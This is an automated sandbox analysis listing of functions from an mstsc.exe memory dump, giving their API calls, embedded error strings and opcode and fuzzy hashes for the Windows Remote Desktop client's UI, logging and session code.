                                                                                                                                                                                    • Opcode ID: 4e701382bbfa76af6576293c59b72fe458328aeaadf1710c75ddcf22c5ec1650
                                                                                                                                                                                    • Instruction ID: 7e207765031ae2adb72fc3bc0a7cf5c5d045d06165f533ed0a576baae4254e6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e701382bbfa76af6576293c59b72fe458328aeaadf1710c75ddcf22c5ec1650
                                                                                                                                                                                    • Instruction Fuzzy Hash: 914191307083485FD76A8F15C858FA637DBAB89308F28016DE5419B9B6CB61DCC2DB11
                                                                                                                                                                                    Function 00920041 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • KillTimer.USER32 ref: 009200EB
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000007D0,00000000), ref: 00920138
                                                                                                                                                                                      • Part of subcall function 00920AC3: GetClientRect.USER32(?,00000006,?,?,00000000,00000006,00000000,?), ref: 00920AE1
                                                                                                                                                                                      • Part of subcall function 00920AC3: RedrawWindow.USER32(?,00000006,00000000,00000045), ref: 00920AF9
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SyncSessionDisplaySettings failed, xrefs: 009200B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Timer$AddressClientFreeHandleKillLibraryMessageModuleProcRectRedrawTraceWindow
                                                                                                                                                                                    • String ID: SyncSessionDisplaySettings failed
                                                                                                                                                                                    • API String ID: 2501523316-3120345431
                                                                                                                                                                                    • Opcode ID: 92cf0036232e3906af5beb59e598d31551b4423ae3060f66755ed1bd8dbd5459
                                                                                                                                                                                    • Instruction ID: ff7ed366e69b1cd21d25df0673763b52a156a7fe03475660af4fc1ce344365a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf0036232e3906af5beb59e598d31551b4423ae3060f66755ed1bd8dbd5459
                                                                                                                                                                                    • Instruction Fuzzy Hash: A441F6316083256FEB299F61E894F7A779ABFC4300F04405DF940AA1A7C7B1D8A1EB55
                                                                                                                                                                                    Function 0091D908 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,00902DA4,00000017,?,00000004,NULL,0000000A,NULL,0000000A,NULL,0000000A,00000000), ref: 0091DA22
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 5413a7c5da4ebac83e563af951914c6c0f42cbe23aaf4d9e3e2f5449ac0ec17e
                                                                                                                                                                                    • Instruction ID: d0afa9d9268928350e9546ac31f8c64bebcd8fb8c3cc12e2b7f35a1b43ce6c47
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5413a7c5da4ebac83e563af951914c6c0f42cbe23aaf4d9e3e2f5449ac0ec17e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28419F7670320EDADF249F15C845AFA77B9EB84744F14442AED559B240E3709ED2CBD0
                                                                                                                                                                                    Function 00914AC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00914B1A
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914B24
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to end all remaining sessions, xrefs: 00914BA2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressDestroyErrorFreeHandleLastLibraryMessageModuleProcTraceWindow
                                                                                                                                                                                    • String ID: Failed to end all remaining sessions
                                                                                                                                                                                    • API String ID: 953134514-2746955642
                                                                                                                                                                                    • Opcode ID: d6b202ada2e46dc31799e0663290bbd5fb9cce9646fd675b5611199ba57373e2
                                                                                                                                                                                    • Instruction ID: 69210bcabbf267684c9ec3de324f16bebe14a25099687bb1c0e49a56fd913ea4
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6b202ada2e46dc31799e0663290bbd5fb9cce9646fd675b5611199ba57373e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27310432B9831C2FD735CE189C89FAABA99AB4C314F06055DF9549B1A2C660DCC09B95
                                                                                                                                                                                    Function 0094D84C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,00908C04,0000000E,00000003,00000004,NULL,0000000A,NULL,0000000A,?,00000004,?,00000004,00000000), ref: 0094D915
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 09f94534fa42cfdb9a4577487cdfe791589404b5f794cf57830cf52fee47d649
                                                                                                                                                                                    • Instruction ID: e81a567c4f952356b01312b3670c93f82e887d080f8444bfcf56fc563f7d7308
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09f94534fa42cfdb9a4577487cdfe791589404b5f794cf57830cf52fee47d649
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721D83A601209ABEB24AF54CC45FBB7779EBC5710F144526FE15DB280E6709D81D790
                                                                                                                                                                                    Function 009523F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,00909810,00000031,?,00000004,NULL,0000000A,NULL,0000000A,?,00000004,00000000), ref: 009524B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 6d127296a7e5ee2c7dda144b5c4a4e224e816b9f0a26012a2bbc9f6594d16297
                                                                                                                                                                                    • Instruction ID: 78d0a9ef290bb828052ac5641eac618e1f316231f689181570330fccdeb12605
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d127296a7e5ee2c7dda144b5c4a4e224e816b9f0a26012a2bbc9f6594d16297
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2105366003059ADB34DF56CC01AB7776DEB86741F188425EE159B1A0E6709D8AC3D0
                                                                                                                                                                                    Function 00950AA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32 ref: 00950B20
                                                                                                                                                                                    • IsWindow.USER32(?), ref: 00950B79
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressDialogFreeHandleLibraryMessageModuleProcTraceWindow
                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                    • API String ID: 4127607370-1037565863
                                                                                                                                                                                    • Opcode ID: 055ef65ec6dd27aa27abeddacbad848fccf83a218454390554c7722ceee4ff71
                                                                                                                                                                                    • Instruction ID: e646411cba5220c2513d3ad0d9c97cbc414de38a3612d25627349a3500d625d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 055ef65ec6dd27aa27abeddacbad848fccf83a218454390554c7722ceee4ff71
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8221C731214349AFDF28DF1AD499B763795AB8931AF104059FD019B1B1C635CD84EF15
                                                                                                                                                                                    Function 00957904 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69memoryencryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?,00956ADC,?,?,?,?,?,00000000,00000000), ref: 00957924
                                                                                                                                                                                    • CertDuplicateCertificateContext.CRYPT32(?,?,00000000,?,?,?,?,00956ADC,?,?,?,?,?,00000000,00000000,?), ref: 0095798B
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocCertCertificateContextDuplicateFreeHandleLibraryLocalMessageModuleProcTrace
                                                                                                                                                                                    • String ID: pCertArray
                                                                                                                                                                                    • API String ID: 2178560606-662488200
                                                                                                                                                                                    • Opcode ID: 72cad34bbe07b938de790f968f64d3c8b7f8786a35b2a6346f8368062ddb0d3d
                                                                                                                                                                                    • Instruction ID: 9c1a609e195645c7efe562b4341fda35cdfc85211cdfa36b9f2e6ce5f4c76cb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72cad34bbe07b938de790f968f64d3c8b7f8786a35b2a6346f8368062ddb0d3d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2321D2B6608304AFC724CF99E894E66BBE9EB49350B214199FC44EB361C671DD00DBA0
                                                                                                                                                                                    Function 0095B269 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoCreateInstance.OLE32(009011C4,00000000,00000001,0090A384,?), ref: 0095B289
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CoCreateInstance failed!, xrefs: 0095B2AE
                                                                                                                                                                                    • pHomeGroup->IsMember failed!, xrefs: 0095B2F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
                                                                                                                                                                                    • String ID: CoCreateInstance failed!$pHomeGroup->IsMember failed!
                                                                                                                                                                                    • API String ID: 3463782917-307709413
                                                                                                                                                                                    • Opcode ID: e9631d74c7cf36d6ab3bcef2b5dca5cb4fa94ae31784037cc75174d78719edc2
                                                                                                                                                                                    • Instruction ID: aad2d7d9fbde01827cf702ec5d08428d993125d445bdf4ada912db6a52fb0e0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e9631d74c7cf36d6ab3bcef2b5dca5cb4fa94ae31784037cc75174d78719edc2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 672179B1604348AFDB19CF56C849F797BADAB89309F18008CF901AA1A1C7B1DD45EB11
                                                                                                                                                                                    Function 0093BA22 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(80070057,0091396B,0000002B,0090B970,0091396B,?,00000004,NULL,00000005,?,00000005,80070057,00000004,00000000,?,FF000000), ref: 0093BAA2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: NULL$W
                                                                                                                                                                                    • API String ID: 471583391-3636870356
                                                                                                                                                                                    • Opcode ID: 2c82d287af1fd9f67903aeffa126bed33239b4a5a8f04509142f7f296607bb64
                                                                                                                                                                                    • Instruction ID: 858d39771e00c66767a68e14171e7f2e698ad80d8471f8fd7b17f7e45089a1cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c82d287af1fd9f67903aeffa126bed33239b4a5a8f04509142f7f296607bb64
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7711C876600609BBDB25CE499C44FBBBBBDDB84350F108169FE59D7240D7315E058BA0
                                                                                                                                                                                    Function 009400B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32 ref: 0094011B
                                                                                                                                                                                      • Part of subcall function 009620A0: IsDlgButtonChecked.USER32(?,00003301,?,00935407), ref: 009620BE
                                                                                                                                                                                      • Part of subcall function 009620A0: IsDlgButtonChecked.USER32(?,000036C6,?,00935407), ref: 009620D4
                                                                                                                                                                                    • EndDialog.USER32 ref: 00940138
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7, xrefs: 00940147
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ButtonCheckedDialog
                                                                                                                                                                                    • String ID: mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7
                                                                                                                                                                                    • API String ID: 2092719057-504666242
                                                                                                                                                                                    • Opcode ID: 7dce49ee8ce0e47374a7a4d6407df751cc24dd245e4dec929c556c7d1c024cf7
                                                                                                                                                                                    • Instruction ID: 2a393007a62a2df92b1ccdffb0eb604d1819e025a618adba95d9234d035d5e24
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dce49ee8ce0e47374a7a4d6407df751cc24dd245e4dec929c556c7d1c024cf7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A11B232208119FBCB299F54DC4AEBA7B69EF89750F048115FF18AA1A1C771DD20E790
                                                                                                                                                                                    Function 009392F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00939323
                                                                                                                                                                                    • SendMessageW.USER32(?,00000440,0000139A,00000020), ref: 009393AE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 568519121-3916222277
                                                                                                                                                                                    • Opcode ID: 02d1f2cea49fe3a9701949f36639f7e3bc6435f2f8dbe1ccf3c71dbb2c5b99fd
                                                                                                                                                                                    • Instruction ID: 74a79436671c259b55470890816dc1376fa5dae7757c2cef30d8b792c5cdf15d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02d1f2cea49fe3a9701949f36639f7e3bc6435f2f8dbe1ccf3c71dbb2c5b99fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB119A7590031CAFDB10DF65DC49BDBB3F9EB88310F1086A9E94993251DA74AE448F44
                                                                                                                                                                                    Function 0091D87E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,00000000,0000002B,00908AB4,00000028,00000000,00000004,NULL,0000000A,0094BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 0091D8F1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 75d187b2b219f56561e03d6ddfe38ced41f188a006db7cfed7c89477756842ff
                                                                                                                                                                                    • Instruction ID: 450ba51cf3175771d2a75db0f1e6fdb6045040e36cdbd833c99e12455cea1127
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75d187b2b219f56561e03d6ddfe38ced41f188a006db7cfed7c89477756842ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: B311E172A01218ABEB249F54DC46FFB736CDB45710F1444AAFE159B180E3B16E91C3A0
                                                                                                                                                                                    Function 0091D1E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000082,00000000,?,00000000), ref: 0091D1FE
                                                                                                                                                                                    • PostMessageW.USER32 ref: 0091D269
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$AddressFreeHandleInfoLibraryModuleParametersPostProcSystemTrace
                                                                                                                                                                                    • String ID: put_FullScreen failed!
                                                                                                                                                                                    • API String ID: 2397186937-1360584600
                                                                                                                                                                                    • Opcode ID: 353bbcc5a9d21f9cc63aea1f23f1784eb3e5ea2019722d15fa681826a21c125b
                                                                                                                                                                                    • Instruction ID: 0c0ff953dca4db9a122826558192721dd0557f9b6671802ff98702a605e04b2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 353bbcc5a9d21f9cc63aea1f23f1784eb3e5ea2019722d15fa681826a21c125b
                                                                                                                                                                                    • Instruction Fuzzy Hash: E811C67270420CBFD7159F95CC89EA67BADFB85354F004565F824D7161CA72DC50DB90
                                                                                                                                                                                    Function 0092426E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetRect.USER32 ref: 009242E4
                                                                                                                                                                                      • Part of subcall function 00916497: MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 009164E1
                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 009242C6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Rect$ByteCharCopyMultiWide
                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                    • API String ID: 3526781790-3887548279
                                                                                                                                                                                    • Opcode ID: 066158643c09da7b1e4ca563d0d45a4ca0a3662d666bf2f88a7396993a51b4dd
                                                                                                                                                                                    • Instruction ID: 035af3a754da264d651e7452cf9b8c1e327f06b602330f27160869f45060e4b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 066158643c09da7b1e4ca563d0d45a4ca0a3662d666bf2f88a7396993a51b4dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7601F532B00218A7DB18EE7AAC56BFE736DDB89311F10852AF822E61C1DE74D8058665
                                                                                                                                                                                    Function 0092697F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(00000000,00000000,0000002B,00906680,00000143,?,00000004,00000000,00000004,NULL,0000000A,00000000,00000000,00000000,?,00930066), ref: 009269EE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 6e45da0fc407211d9491d347743d0a3fb50ab53118d18b03fc578292d86b7c0b
                                                                                                                                                                                    • Instruction ID: bfa94eafd92959d30f019a4e6ed30cfb4741dda060b4b11ceac19cf4897e65d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e45da0fc407211d9491d347743d0a3fb50ab53118d18b03fc578292d86b7c0b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901243A280311AAEF248F04EC05FB73329DBC5B40F008519FB214B9D8CAB06DDAC390
                                                                                                                                                                                    Function 0094BB01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MonitorFromWindow.USER32(?,00000002,00902988,0096A020), ref: 0094BB35
                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,00000000), ref: 0094BB4B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
